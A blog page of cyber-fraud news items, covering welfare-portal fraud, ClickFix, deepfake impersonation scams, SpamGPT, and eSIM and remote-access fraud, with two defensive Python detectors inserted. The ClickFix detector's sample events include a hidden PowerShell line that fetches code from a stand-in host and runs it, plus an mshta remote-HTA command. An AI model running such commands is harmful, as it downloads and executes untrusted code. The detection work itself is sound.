Showing posts with label Cyber Fraud.

Cybercrime Gang Busted for Massive Fake Welfare Portal Scam in India

 

A massive inter-state cybercrime syndicate targeting government welfare schemes in India was busted by police under an operation code-named “Shutterdown,” revealing one of the largest frauds of recent years involving over 36 arrests and millions siphoned off from government funds intended for farmers, pensioners, and low-income citizens.

The gang, which included government employees and technically skilled individuals, exploited structural vulnerabilities in official portals of welfare schemes such as PM Kisan Samman Nidhi, Social Security Pension, and various compensation programs.

Sophisticated modus operandi

The perpetrators manipulated government databases, using unauthorized IDs to activate fraudulent accounts and reroute OTPs to agents, ensuring transactions remained undetected during operational hours. 

Fake beneficiaries were created by purchasing bank account details and identity documents from ineligible persons, who were promised welfare funds in exchange for providing their credentials. Large sums were systematically withdrawn using forged identities and quick cash transactions, backed by real-time data manipulation on government digital platforms.

Scale and impact

Police investigations uncovered over 11,000 fake beneficiary accounts, with evidence of systematic siphoning through a web of financial activity stretching across districts such as Jodhpur, Kota, Bundi, Dausa, and beyond. The operation led to the seizure of more than ₹52 lakh in cash, luxury vehicles, hundreds of SIM cards, biometric devices, and documents linked to thousands of accounts.

Police credited the success of the crackdown to proactive citizen informants, technical surveillance, and coordination between state police and banking institutions, including immediate freezing of suspect accounts and deployment of forensic audit teams by leading banks.

Key masterminds and ongoing probe

The fraud’s mastermind, Ramavatar Saini, leveraged intimate knowledge of welfare portals to orchestrate the scam, aided by collaborators like Mohammad Laeeq (with access to nodal office systems) and Subhash (who sourced bulk data of ineligible beneficiaries). 

Additional suspects from multiple states remain at large, with police announcing rewards for their capture. The breakthrough is expected to spark reforms addressing high-tech vulnerabilities in digital welfare delivery platforms and improve coordination for inter-state financial crime investigations.

Authorities have emphasized the need for urgent technical upgrades to official systems and more robust verification protocols to prevent future cyber-enabled misuse of welfare funds. Public vigilance, rapid intelligence sharing, and cross-agency collaboration played a vital role in uncovering the racket and containing its financial fallout.

ClickFix Attack Tricks Users into Infecting Their Own Devices

 

Cybercriminals are increasingly using a social engineering attack called ClickFix, which manipulates victims into unknowingly initiating cyberattacks on their own systems. According to Microsoft’s 2025 Digital Defense Report, ClickFix has become the most common initial access technique, recorded in 47% of attacks tracked by Microsoft Defender Experts over the past year. This rise is largely attributed to attackers’ growing ability to bypass traditional anti-phishing protections and successfully exploit human behavior.

What is ClickFix?

ClickFix is a deceptive tactic that capitalizes on users' desire to solve seemingly simple technical problems. It typically starts with a phishing email or fraudulent website designed to look like a legitimate service; one notable example was seen in spoofed Booking.com emails during the 2024 holiday season.

The victim is prompted through a fake notification to resolve an issue, often by copying and pasting a code snippet or clicking through a sequence mimicking technical support instructions. Unbeknownst to the user, these instructions result in executing malicious PowerShell or mshta.exe commands, which launch malware directly into system memory—bypassing the need for a downloaded file and evading common antivirus solutions.
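One way to hunt for this behavior in endpoint telemetry, as an added example that is not part of the original post: the sketch below scores process-creation events (field names follow Sysmon Event ID 1) for PowerShell or mshta.exe started by explorer.exe with command-line traits typical of pasted lure commands. It assumes the pasted command is launched from the Windows Run dialog or File Explorer, so the parent process is explorer.exe; the rule names, function names, and sample events are constructed for illustration.

```python
import re
from ntpath import basename  # parses Windows paths on any OS

# Interpreters named in the post; pwsh.exe (PowerShell 7) is added here as an assumption.
INTERPRETERS = {"powershell.exe", "pwsh.exe", "mshta.exe"}

# Command-line traits of a pasted one-liner rather than an interactive shell.
POWERSHELL_RULES = {
    "hidden_window": re.compile(r"\s-w[a-z]*\s+hidden\b", re.I),
    "encoded_command": re.compile(r"\s-e[a-z]*\s+[a-z0-9+/=]{20,}", re.I),
}
FETCH = re.compile(r"\b(irm|iwr|invoke-restmethod|invoke-webrequest)\b|downloadstring", re.I)
EXEC = re.compile(r"\b(iex|invoke-expression)\b", re.I)
REMOTE_URL = re.compile(r"https?://", re.I)
# Lures often end with a comment so the visible text looks like a verification step.
TRAILING_COMMENT = re.compile(r"\s#\s*\S.*$")


def clickfix_indicators(event):
    """Return the list of indicator names for one process-creation event."""
    image = basename(event["Image"]).lower()
    parent = basename(event["ParentImage"]).lower()
    cmd = event["CommandLine"]
    # Only interpreters started directly by the user's shell are in scope.
    if image not in INTERPRETERS or parent != "explorer.exe":
        return []
    hits = []
    if image == "mshta.exe":
        # mshta runs whatever HTA the URL serves, so a remote URL is enough.
        if REMOTE_URL.search(cmd):
            hits.append("remote_url")
    else:
        hits += [name for name, rx in POWERSHELL_RULES.items() if rx.search(cmd)]
        if FETCH.search(cmd) and EXEC.search(cmd):
            hits.append("download_and_execute")
    # The comment only matters when something else already looks wrong.
    if hits and TRAILING_COMMENT.search(cmd):
        hits.append("trailing_comment")
    return hits


def find_clickfix_candidates(events):
    """Return (image name, indicators) for every event with at least one hit."""
    results = []
    for event in events:
        hits = clickfix_indicators(event)
        if hits:
            results.append((basename(event["Image"]).lower(), hits))
    return results


# Constructed sample events (not real telemetry); hosts use the reserved .invalid TLD.
PS = r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"
SAMPLE_EVENTS = [
    {"Image": PS, "ParentImage": r"C:\Windows\explorer.exe",
     "CommandLine": 'powershell -w hidden -c "iex (irm https://cdn.example.invalid/v)"'
                    " # Verification ID 4821"},
    {"Image": r"C:\Windows\System32\mshta.exe", "ParentImage": r"C:\Windows\explorer.exe",
     "CommandLine": "mshta https://files.example.invalid/check.hta"},
    # User simply opens a PowerShell window: no indicators.
    {"Image": PS, "ParentImage": r"C:\Windows\explorer.exe", "CommandLine": f'"{PS}"'},
    # Hidden scheduled job: same flag, but the parent is not explorer.exe.
    {"Image": PS, "ParentImage": r"C:\Windows\System32\svchost.exe",
     "CommandLine": r"powershell.exe -NoProfile -WindowStyle Hidden -File C:\Scripts\backup.ps1"},
    # -ExecutionPolicy must not be mistaken for -EncodedCommand.
    {"Image": PS, "ParentImage": r"C:\Windows\explorer.exe",
     "CommandLine": r"powershell.exe -ExecutionPolicy Bypass -File C:\Tools\setup.ps1"},
]

if __name__ == "__main__":
    for image, hits in find_clickfix_candidates(SAMPLE_EVENTS):
        print(image, hits)
```

Requiring both the explorer.exe parent and a command-line trait keeps routine administrative PowerShell out of the results; treat hits as leads for triage, not verdicts.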

Changing threat landscape

ClickFix is especially concerning because it reflects a broader shift in cybercriminal tactics: exploiting human psychology over technical vulnerabilities. Security vendors highlight that this trend is amplified by the use of artificial intelligence, which enables attackers to craft highly convincing phishing lures and even simulate full conversation threads for business email compromise schemes. 

The payloads delivered through ClickFix attacks are diverse and dangerous, including ransomware, information stealers, remote access trojans (RATs), and worms such as XWorm, Danabot, and NetSupport RAT. Reports from security vendors indicate a 500% surge in ClickFix incidents in the first half of 2025, making up an estimated 8% of all attacks during that period.

Defense strategies and user awareness

Traditional defenses based on blocking suspicious attachments, network traffic, or sender domains cannot reliably stop ClickFix. Instead, organizations and individuals must focus on behavioral change: never follow unsolicited technical instructions without independent verification, and always treat requests for manual intervention—like pasting unfamiliar code—with skepticism.

Security awareness training and updated incident response plans are crucial for combating this new wave of attacks. As threat actors continue to refine their methods, education and skepticism remain the frontline defenses against self-induced cyber threats.

Noosa Council Hit by $2.3 Million AI Fraud: Mayor Calls It “Unprecedented” Cyber Attack

 

Noosa Council in Queensland has disclosed that it fell victim to an advanced cyber fraud in December 2024, resulting in $2.3 million being transferred overseas through deceptive means. According to Mayor Frank Wilkie, the perpetrators leveraged AI-based imitation tools to convincingly mimic council executives, tricking staff into approving the unauthorized transactions.

Roughly $400,000 of the stolen amount has been recovered so far, leaving a loss of around $1.9 million. The council has emphasized that no employees are being held responsible and assured residents that ratepayer information and operational systems remain secure.

Statements from the Mayor and CEO
Mayor Wilkie described the incident as “unprecedented,” warning of the increasing sophistication of technology-enabled crime:

“It enables skilled fraudsters to imitate personalities and individuals to a very high degree.”

Council CEO Larry Sengstock confirmed that while investigations are ongoing, external forensic IT specialists have found no evidence of a system breach or compromise of public data. Sengstock also explained that the council’s delay in making the matter public was due to restrictions imposed by law enforcement.

Cybersecurity analysts believe the criminals may have used AI-driven tactics—such as deepfake videos, voice cloning, or impersonation through emails and calls—to deceive staff. Dr. Dennis Desmond, a former FBI investigator, suggested that publicly available data might have been collected to craft realistic impersonations of senior officials.

These scams often exploit human trust rather than system vulnerabilities, manipulating employees into approving large transfers under false pretenses.

India’s Expanding Digital Reach Brings New Cybersecurity Challenges

 



India’s digital transformation has advanced rapidly over the past decade. With more than 86% of households now online, the Digital India initiative has helped connect citizens, businesses, and services like never before. However, this growing connectivity has also exposed millions to rising cybersecurity risks and financial fraud.

According to official government data, reported cybersecurity incidents have more than doubled, from 10.29 lakh in 2022 to 22.68 lakh in 2024. Experts say this rise not only reflects a more complex threat environment but also improved mechanisms for tracking and reporting attacks.

By February 2025, complaints worth ₹36.45 lakh in total had been filed on the National Cyber Crime Reporting Portal (NCRP), revealing the scale of digital financial fraud in the country.


The Changing Face of Cyber Frauds

Cybercriminals are constantly evolving their methods. Traditional scams like phishing and spoofing, where fraudsters pretend to represent banks or companies, are now being replaced by more advanced schemes. Some use artificial intelligence to generate convincing fake voices or videos, making deception harder to detect.

A major area of exploitation involves India’s popular Unified Payments Interface (UPI). Attackers have been using compromised mobile numbers to steal funds. In response, the Department of Telecommunications introduced the Financial Fraud Risk Indicator (FRI), which identifies phone numbers showing suspicious financial activity.

Another serious concern is the surge of illegal online betting and gaming applications. Investigations suggest these platforms have collectively generated over ₹400 crore through deceptive schemes. To address this, the government passed the Promotion and Regulation of Online Gaming Bill, 2025, which bans online money gaming while supporting legitimate e-sports and social gaming activities.

India’s legal and institutional framework for cybersecurity continues to expand. The Information Technology Act, 2000, remains the backbone of cyber law, supported by newer policies such as the Digital Personal Data Protection Act, 2023, which reinforces users’ privacy rights and lawful data handling. The Intermediary Guidelines and Digital Media Ethics Code, 2021, also make digital platforms more accountable for the content they host.

The Union Budget 2025–26 allocated ₹782 crore for national cybersecurity initiatives. The government has already blocked over 9.42 lakh SIM cards and 2.63 lakh IMEIs associated with fraudulent activity. Through the CyTrain portal, over one lakh police officers have received training in digital forensics and cybercrime investigation.


National Coordination and Citizen Awareness

Agencies like CERT-In and the Indian Cyber Crime Coordination Centre (I4C) are central to India’s cyber response system. CERT-In has conducted over 100 cyber drills involving more than 1,400 organizations to assess preparedness. I4C’s “Samanvaya” and “Sahyog” platforms enable coordination across states and assist in removing harmful online content.

The government’s helpline number 1930 and the cybercrime portal cybercrime.gov.in provide citizens with direct channels to report cyber incidents. Awareness campaigns through radio, newspapers, and social media further aim to educate the public on online safety.


A Shared Responsibility

India’s expanding digital frontier holds immense promise, but it also demands shared responsibility. With stronger laws, institutional coordination, and public vigilance, India can continue to drive its digital progress while keeping citizens safe from cyber threats.



How Reporting Spam Calls and Texts Helps Stop Scammers for Everyone

 

 

Almost everyone has experienced an unexpected call or text from an unknown number. While some turn out to be harmless misdials, many are actually spam or phishing attempts aimed at stealing personal or financial information. In some cases, the scam is obvious—like a caller asking for banking or credit card details—but other times, it’s much harder to tell.

To combat this, tech giants like Apple and Google allow users to mark suspicious calls or texts as spam or junk. Once flagged, your mobile carrier, the device manufacturer, third-party databases, and sometimes even federal bodies like the FCC and FTC, are notified.

On the network side, reported numbers are added to a centralized spam database. That’s why some calls appear on your screen labeled “Spam Likely.” It means that enough users have flagged the number, prompting your carrier to take preventive action. Essentially, every report you make contributes to a safer network for all users.

Modern carriers also use AI and machine learning to detect and block spam activity. For example, Google’s AI-based scam detection system becomes smarter and more accurate the more users report suspicious calls and messages.

Third-party apps like Truecaller, RoboKiller, and Hiya also rely on user reports to strengthen their own spam-blocking databases. This collective effort creates a ripple effect—when users flag spam, these systems improve their ability to identify and prevent future scams.

Unfortunately, scammers are evolving too. One of their most common tricks is “neighbor spoofing,” where they disguise their number to look like a local one. This creates a false sense of trust (“It’s a call from my area, it must be legitimate”). Fraudsters may even impersonate government bodies or organizations like the IRS or local police to extract personal data.

If you’re uncertain about the legitimacy of a call or text, the safest move is to hang up and contact the organization directly using verified contact details. Chances are, they’ll confirm it was a scam attempt.

To stay protected, you can also use your phone’s built-in spam filters:

  • For iPhone users: Go to Settings > Messages > Message Filtering > Unknown & Spam > Filter Unknown Senders. To block a number, tap the info icon next to it and select Block Contact, or long-press a spam text and block it directly.

  • For Android users: Open Google Messages > Settings > Spam Protection > Enable Spam Protection. To block, open Phone > More > Call history, choose the number, and tap Block/Report Spam. You can also block a number directly from your text messages by long-pressing the conversation.

Additionally, you can report spam directly to your mobile carrier by forwarding the suspicious message to 7726 (SPAM). If you believe you’ve encountered fraudulent activity, you can file a report with both the FTC and FCC for further investigation.

By consistently reporting spam, users help improve detection tools, reduce fraud, and make communication networks safer for everyone.


AI Turns Personal: Criminals Now Cloning Loved Ones to Steal Money, Warns Police

 



Police forces in the United Kingdom are alerting the public to a surge in online fraud cases, warning that criminals are now exploiting artificial intelligence and deepfake technology to impersonate relatives, friends, and even public figures. The warning, issued by West Mercia Police, stresses how technology is being used to deceive people into sharing sensitive information or transferring money.

According to the force’s Economic Crime Unit, criminals are constantly developing new strategies to exploit internet users. With the rapid evolution of AI, scams are becoming more convincing and harder to detect. To help people stay informed, officers have shared a list of common fraud-related terms and explained how each method works.

One of the most alarming developments is the use of AI-generated deepfakes, realistic videos or voice clips that make it appear as if a known person is speaking. These are often used in romance scams, investment frauds, or emotional blackmail schemes to gain a victim’s trust before asking for money.

Another growing threat is keylogging, where fraudsters trick victims into downloading malicious software that secretly records every keystroke. This allows criminals to steal passwords, banking details, and other private information. The software is often installed through fake links or phishing emails that look legitimate.

Account takeover, or ATO, remains one of the most common types of identity theft. Once scammers access an individual’s online account, they can change login credentials, reset security settings, and impersonate the victim to access bank or credit card information.

Police also warned about SIM swapping, a method in which criminals gather personal details from social media or scam calls and use them to convince mobile providers to transfer a victim’s number to a new SIM card. This gives the fraudster control over the victim’s messages and verification codes, making it easier to access online accounts.

Other scams include courier fraud, where offenders pose as police officers or bank representatives and instruct victims to withdraw money or purchase expensive goods. A “courier” then collects the items directly from the victim’s home. In many cases, scammers even ask for bank cards and PIN numbers.

The force’s notice also included reminders about malware and ransomware, malicious programs that can steal or lock files. Criminals may also encourage victims to install legitimate-looking remote access tools such as AnyDesk, allowing them full control of a victim’s device.

Additionally, spoofing, the act of disguising phone numbers, email addresses, or website links to appear genuine, continues to deceive users. Fraudsters often combine spoofing with AI to make fake communication appear even more authentic.

Police advise the public to remain vigilant, verify any unusual requests, and avoid clicking on suspicious links. Anyone seeking more information or help can visit trusted resources such as Action Fraud or Get Safe Online, which provide updates on current scams and guidance on reporting cybercrime.



SpamGPT: AI-Powered Phishing Tool Puts Cybersecurity at Risk

 

While most people have heard of ChatGPT, a new threat called SpamGPT is now making headlines. Security researchers at Varonis have discovered that this professional-grade email campaign tool is designed specifically for cybercriminals. The platform, they report, offers “all the conveniences a Fortune 500 marketer might expect, but adapted for cybercrime.”

SpamGPT’s dashboard closely mimics legitimate email marketing software, allowing attackers to plan, schedule, and track large-scale spam and phishing campaigns with minimal effort. By embedding AI-powered features, the tool can craft realistic phishing emails, optimize subject lines, and fine-tune scams—making it accessible even to criminals with little technical background.

"SpamGPT is essentially a CRM for cybercriminals, automating phishing at scale, personalizing attacks with stolen data, and optimizing conversion rates much like a seasoned marketer would. It's also a chilling reminder that threat actors are embracing AI tools just as fast as defenders are," explained Rob Sobers, CMO at Varonis.

The toolkit includes built-in modules for SMTP/IMAP configuration, inbox monitoring, and deliverability testing. Attackers can upload stolen SMTP credentials, verify them through an integrated checker, and rotate multiple servers to avoid detection. IMAP monitoring further allows criminals to track replies, bounces, and email placement.

A real-time inbox check feature sends test emails and confirms whether they land in inboxes or spam folders. Combined with campaign analytics, SpamGPT functions much like a legitimate customer relationship management (CRM) platform—but is weaponized for phishing, ransomware, and other cyberattacks.

Marketed as a “spam-as-a-service” solution, SpamGPT lowers the skill barrier for cybercrime. Tutorials such as “SMTP cracking mastery” guide users in obtaining or hacking servers, while custom header options make it easier to spoof trusted brands or domains. This means even inexperienced attackers can bypass common email authentication methods and run large-scale campaigns.

Experts warn that the rise of SpamGPT could trigger a surge in phishing, ransomware, and malware attacks. Its ability to slip past spam filters and disguise malicious payloads as legitimate correspondence makes it especially dangerous for both individuals and businesses.

To counter threats like SpamGPT, cybersecurity experts recommend:

  • Enforcing DMARC, SPF, and DKIM to block spoofed emails.

  • Deploying AI-driven phishing detection tools.

  • Maintaining regular backups and malware removal protocols.

  • Implementing multi-factor authentication (MFA) across all accounts.

  • Providing ongoing phishing awareness training for employees.

  • Using network segmentation and least-privilege access controls.

  • Keeping software and security patches updated.

  • Testing and refining incident response plans for rapid recovery.

SpamGPT demonstrates how cybercriminals are harnessing AI to evolve their tactics. As defenses improve, attackers are adapting just as quickly—making vigilance and layered security strategies more critical than ever.

Rising Online Scams: From Phishing Emails to Fake News Feeds

 

Cybercriminals are increasingly using sophisticated tactics to target unsuspecting users through phishing emails and fake news stories, security experts warn. Recent examples highlight how hackers exploit urgency, impersonation, and malicious attachments to trick victims into revealing sensitive information or downloading harmful software.

A phishing attempt can come in the form of an email with the subject line “Quick favor needed.” According to cybersecurity analysts, such subject lines are designed to create urgency and prompt quick responses.

The sender’s name was unfamiliar, and closer inspection of the email address revealed an impersonation attempt. The address used the name of a well-known food delivery service, Deliveroo, but with a deliberate spelling error to appear legitimate.

The email included what was described as a “screenshot” attachment. However, the file was not an image but an HTML document disguised as one. Code inside the file redirected to a counterfeit Deliveroo website featuring a message that appeared to be loading content, along with a button instructing users to “Click here if your page does not load automatically.”

Experts note that clicking such links often leads to malicious websites capable of installing malware. The email displayed nearly all the hallmarks of a phishing attack: urgency, impersonation, and a misleading attachment.
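A mail-gateway or triage check for the disguised attachment described above, as an added example that is not part of the original post: it parses a message, compares what each attachment claims to be (image MIME type or extension) with what its bytes are, and lists any redirect targets found in HTML that poses as an image. It assumes the attachment carried an image name or type; the function names, addresses, and sample message are constructed for illustration.

```python
import re
from email import message_from_bytes, policy
from email.message import EmailMessage

# File signatures for the image types a "screenshot" would normally use.
IMAGE_MAGIC = (b"\x89PNG\r\n\x1a\n", b"\xff\xd8\xff", b"GIF87a", b"GIF89a")
IMAGE_EXT = (".png", ".jpg", ".jpeg", ".gif")
HTML_START = re.compile(rb"^\s*(<!doctype\s+html|<html|<head|<script|<meta)", re.I)
# Meta-refresh and JavaScript location redirects to an absolute URL.
REDIRECT = re.compile(
    rb"""(?:url\s*=\s*|location(?:\.href)?\s*=\s*|location\.replace\(\s*)['"]?(https?://[^'"\s>)]+)""",
    re.I,
)


def sniff(data):
    """Classify attachment bytes by content, ignoring name and declared type."""
    if data.startswith(IMAGE_MAGIC):
        return "image"
    if HTML_START.match(data.lstrip(b"\xef\xbb\xbf")):  # tolerate a UTF-8 BOM
        return "html"
    return "unknown"


def audit_attachments(raw_message):
    """Return one finding per attachment that claims to be an image but is not."""
    msg = message_from_bytes(raw_message, policy=policy.default)
    findings = []
    for part in msg.iter_attachments():
        name = part.get_filename() or ""
        data = part.get_payload(decode=True) or b""
        claims_image = (
            part.get_content_maintype() == "image"
            or name.lower().endswith(IMAGE_EXT)
        )
        actual = sniff(data)
        if claims_image and actual != "image":
            redirects = []
            if actual == "html":
                redirects = [u.decode("ascii", "replace") for u in REDIRECT.findall(data)]
            findings.append({
                "filename": name,
                "declared": part.get_content_type(),
                "actual": actual,
                "redirects": redirects,
            })
    return findings


def build_sample_message():
    """Constructed sample: an HTML redirect page labelled as a PNG, plus a real PNG header."""
    msg = EmailMessage()
    msg["From"] = "Support <help@brand-support.example>"
    msg["To"] = "user@example.org"
    msg["Subject"] = "Quick favor needed"
    msg.set_content("Please check the attached screenshot.")
    html = (
        b'<html><head><meta http-equiv="refresh" '
        b'content="0; url=https://login.example.invalid/load"></head>'
        b"<body>Loading...</body></html>"
    )
    msg.add_attachment(html, maintype="image", subtype="png", filename="screenshot.png")
    msg.add_attachment(b"\x89PNG\r\n\x1a\n" + b"\x00" * 16,
                       maintype="image", subtype="png", filename="logo.png")
    return msg.as_bytes()


if __name__ == "__main__":
    for finding in audit_attachments(build_sample_message()):
        print(finding)
```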

Fake News Article Used to Spread Malware

Another case emerged through Google Discover, where a story about daylight savings time surfaced in the feed. Upon clicking, users were greeted with a pop-up warning that their device was infected with “two harmful viruses.”

The fraudulent message further claimed that the infections originated from “recent adult sites” and warned that a phone’s SIM card, contacts, and data could be damaged unless a recommended app was installed. Instead of directing users to the Google Play Store, the link led to a third-party website prompting the download of an APK file.

Such apps often request unnecessary permissions, potentially granting cybercriminals access to personal data or enabling them to install dangerous malware under the guise of system updates.


Security specialists emphasize the importance of staying calm and skeptical when encountering suspicious messages. Hackers often attempt to provoke emotional responses to drive quick, careless actions. Warning signs include:

  • Messages creating a sense of urgency
  • Suspicious or misspelled sender addresses
  • Unexpected attachments or links
  • Poor spelling and grammar

To minimize risks, experts recommend using password managers to generate and store unique credentials, installing reputable antivirus software, and regularly updating knowledge on emerging cyber threats.

Cybercriminals frequently recycle tactics across different platforms, making awareness and vigilance the strongest defenses.

South Korea Intensifies Crackdown with Return of Casino Crime Suspects

 


In a sweeping move that underscores both the scale of organised gambling operations in Asia and the increasing threat of cross-border crime, South Korean authorities have dismantled an illicit casino network that funnelled the equivalent of KRW 44 billion through secretive online platforms over the past 18 months.

Ten people, seven of whom are facing criminal charges under the National Sport Promotion Act in Korea, have been arrested for orchestrating and managing the gambling ring, which originated in Cambodia and attracted more than 11,000 users despite South Korea's strict ban on online gambling.

Those arrested include the alleged ringleader, whose identity is still being withheld by investigators as they pursue more leads about the network's overseas connections. The case not only demonstrates the government's determination to curb illegal gambling but also intensifies debate around South Korea's restrictive regulatory framework, which critics argue could become increasingly vulnerable as neighbouring jurisdictions liberalise their gambling laws and compete for market share.

The National Police Agency (NPA) also said that the operation marked the largest overseas repatriation of criminal suspects in South Korean history, with 49 fugitives returned from the Philippines, a crime hub that has been used for years by criminals seeking to evade justice. Of these, 25 individuals were allegedly involved in fraud schemes, including voice phishing networks that have caused a large amount of financial damage in recent years.

Moreover, 17 suspects have been linked to illegal online gambling platforms, while three individuals have been charged with violent crimes. Authorities also confirmed that one suspect was returned in connection with a series of crimes, including embezzlement, foreign exchange abuse, tax evasion, and sex crimes, all of which are being investigated.

Investigators noted that the suspects had evaded capture for an average of three years and six months, which underscores both the persistence of transnational fugitives and the scope of the coordinated effort needed to locate them.

The National Police Agency confirmed the repatriation of 49 suspects linked to what has been regarded as the largest illegal casino operation ever uncovered, worth approximately 5.3 trillion KRW ($3.8 billion).
Several of the returned suspected ringleaders are alleged to have operated across borders, attracting the attention of international authorities, including the United Nations and the International Criminal Court. Forty-five of the individuals were reportedly subjects of Interpol Red Notices, while domestic investigators have issued 154 warrants related to the case, indicating the scale of the investigation.

As a result of this coordinated crackdown, a wide variety of charges have now been filed against these suspects, ranging from cybercrime and fraud to organised gambling and large-scale tax evasion, emphasising just how intricate and extensive the dismantled criminal enterprise was.

During the discussion, South Korean Ambassador Lee Sang-hwa highlighted the operation's broader significance, describing it as a turning point in the strategic partnership between Seoul and Manila.

The mass repatriation has drawn a lot of attention and served as a clear signal to fugitives that the Philippines would no longer serve as a sanctuary for them, and that offenders seeking refuge abroad would eventually be brought to justice.

One of the returned fugitives had evaded capture for more than sixteen years, while the remainder had spent more than three years in hiding before they were found. The operation was the largest simultaneous return of fugitives from a single country ever, which demonstrates the degree of international collaboration involved.

Additionally, the ambassador noted that by collaborating with the Philippine Bureau of Immigration and the Korean National Police Agency, the Embassy was strengthening bilateral cooperation and significantly enhancing the safety of citizens of both nations.

During a recent policy forum organised jointly by The Korea Times and the Tourism Sciences Society of Korea, leading industry experts urged that an official task force be created to address the mounting issue of Korean nationals engaging in overseas gambling on an increasing scale. According to data provided by the National Gambling Control Commission, the number of South Korean gamblers overseas increased in 2017, with Macau and the Philippines the most frequent destinations.

According to Professor Lee Jae-seok of Gangneung-Wonju National University, gambling markets are expanding far beyond these traditional hubs to emerging centers like Laos, Cambodia, and Vietnam, while simultaneously shifting toward rapidly evolving online gambling platforms.

It is of utmost importance that there be a permanent regulatory body that monitors and oversees gambling activities throughout the wider ASEAN region. The call for reform comes at a time when enforcement has been ramped up in recent years, with a gambling ring in Cambodia recently dismantled and scrutiny of payment networks linked to illegal betting operations intensified.

As the latest wave of arrests and repatriations has demonstrated, the South Korean government is determined to tear apart sprawling gambling and fraud networks, and regional cooperation has become critical in fighting transnational crimes such as this. With gambling hubs proliferating across Southeast Asia and online platforms developing rapidly, law enforcement alone cannot carry the burden of deterrence.

To complement its compliance campaigns, South Korea needs structural reforms, for example the establishment of a permanent regulatory body able to track financial flows, monitor online platforms, and coordinate intelligence with its ASEAN partners. Such a framework could help curb illegal gambling at its root, reduce the costs and harms resulting from these operations, and boost trust between governments and the citizens they work to protect.

In addition to enforcement, public awareness campaigns and enhanced financial monitoring are also imperative to prevent such enterprises from getting the funding they need. These initiatives will ultimately succeed if South Korea is able to strike a balance between strong domestic regulation and proactive international engagement, thereby ensuring that criminal networks have fewer hiding places.

Muzaffarpur Man Loses ₹3.5 Lakh in Remote Access App Bank Fraud

 

A resident of Muzaffarpur, Bihar fell victim to a sophisticated remote access application scam that resulted in the loss of ₹3.5 lakh from his bank account. The cybercrime incident occurred when the victim was searching online for courier service assistance and discovered what appeared to be a legitimate customer support contact number through Google search results. 

Scam operation 

The fraudsters posed as courier service agents and initiated contact with the unsuspecting victim. During the conversation, the criminals convinced the man to download and install a remote access application on his mobile device, claiming it would help resolve his delivery-related issues. Once the victim granted remote access permissions to the application, the cybercriminals gained complete control over his smartphone and banking applications.

Financial impact  

Within minutes of installing the malicious remote access software, the fraudsters executed multiple unauthorized transactions from the victim's bank account. The scammers managed to conduct seven separate high-value financial transfers, draining a total amount of ₹3.5 lakh from the man's banking accounts. The transactions were processed rapidly, taking advantage of the victim's digital banking credentials that were accessible through the compromised device.

Broader criminal network 

Local police investigations have revealed that this incident is part of a larger interstate fraud syndicate operating across multiple states. The cyber crime cell has traced the fraudulent transactions to various bank accounts, suggesting a well-organized criminal network. Law enforcement agencies suspect that the scammers strategically place fake customer service numbers on internet search platforms, impersonating official service providers to target unsuspecting consumers.

Rising threat 

This case represents an alarming trend in cybercrime where fraudsters exploit remote desktop applications like AnyDesk and TeamViewer to gain unauthorized access to victims' devices. The scammers often target individuals seeking customer support for various services, including courier deliveries, utility bills, and other common consumer needs. These social engineering attacks have become increasingly sophisticated, with criminals creating convincing scenarios to pressure victims into installing malicious software. 

Prevention and safety measures 

Cybersecurity experts emphasize the importance of digital awareness and caution when dealing with unsolicited support calls or online search results. Users should verify customer service numbers directly from official websites rather than relying on search engine results. 

Additionally, individuals should never install remote access applications unless they are completely certain about the legitimacy of the requesting party. Financial institutions and telecom providers are working to implement enhanced fraud detection systems to identify and prevent such scams in real time.

Fake eSIM Activation Fraud in India Raises Cybersecurity Concerns

 

The Indian Cybercrime Coordination Centre (I4C), operating under the Ministry of Home Affairs, has issued a warning about a new and highly sophisticated digital scam that leverages fake eSIM activation to commit financial fraud. Unlike traditional methods of cybercrime that require OTPs or ATM PINs, this scheme enables criminals to bypass such checks entirely, making it one of the most dangerous fraud tactics currently emerging.  

Authorities revealed that the scam typically begins with fraudsters making calls to potential victims, convincing them to click on a deceptive eSIM activation link. Once the user follows through, the individual’s physical SIM card is disabled and the number is seamlessly transferred to an eSIM-enabled device controlled by the attacker. This maneuver effectively gives the fraudster complete control over the victim’s mobile number, allowing them to intercept bank OTPs and authorize financial transactions without the user’s knowledge. In one case under investigation, close to ₹4 lakh was illegally withdrawn from an account using this method. 

The fraud takes advantage of the rising adoption of eSIM technology, which has been promoted as a convenient alternative to physical SIM cards since it allows remote provisioning. However, the same convenience has created a new opportunity for exploitation by cybercriminals. By seizing control of a victim’s number, scammers gain access to digital banking and payment systems with alarming ease. 

The alert follows closely after the Department of Telecommunications’ Financial Fraud Risk Indicator system flagged and blacklisted between 300,000 and 400,000 SIM cards suspected of being tied to financial scams. This system, supported by AI-driven tools, identifies around 2,000 high-risk numbers every day, with many linked to fraudulent activities such as fake investment opportunities and bogus job offers. 

Authorities have urged citizens to remain cautious when receiving unexpected calls or links related to eSIM activation. They emphasized that if a mobile device suddenly loses connectivity without explanation, users should treat it as a red flag. Immediate reporting to the telecom operator and the bank could prevent financial losses by cutting off the criminal’s access to transactions.  

Since its launch in January 2020, the I4C portal has functioned as a central platform for reporting and monitoring cybercrimes across the country. As digital transactions continue to grow and smartphones dominate personal and professional life, India has witnessed a sharp increase in online fraud cases. The latest warning from I4C highlights the need for vigilance as technology evolves, reminding users that convenience must always be balanced with awareness of potential risks.

Deepfake Video of Sadhguru Used to Defraud Bengaluru Woman of Rs 3.75 Crore


 

In a striking example of how emerging technologies are being weaponised for deception, a 57-year-old Bengaluru-based woman was defrauded of Rs 3.75 crore through an AI-generated deepfake video purporting to show the spiritual leader Sadhguru.

The woman, who identified herself as Varsha Gupta from CV Raman Nagar, said she did not know that deepfakes existed when she saw a social media reel that appeared to show Sadhguru promoting stock investments through a trading platform and encouraging viewers to start with as little as $250.

Convinced of its authenticity by the video and the interactions that followed, she invested heavily between February and April, only to discover later that she had been deceived. During that period, multiple fake advertisements featuring AI-generated voices and images of Sadhguru were circulating on the internet, leading police to confirm the case and launch an investigation.

The incident highlights not only the escalating financial risk posed by deepfake technology but also the growing ethical and legal issues associated with it: Sadhguru had recently filed a petition with the Delhi High Court to protect his rights against unauthorised AI-generated content that may harm his persona.

Varsha was immediately contacted by an individual who identified himself as Waleed B and claimed to be an agent of Mirrox. To tutor her, he used multiple UK phone numbers, added her to a WhatsApp group with close to 100 members, and set up trading tutorials over Zoom. When Waleed later withdrew, another man named Michael C took over as her trainer.

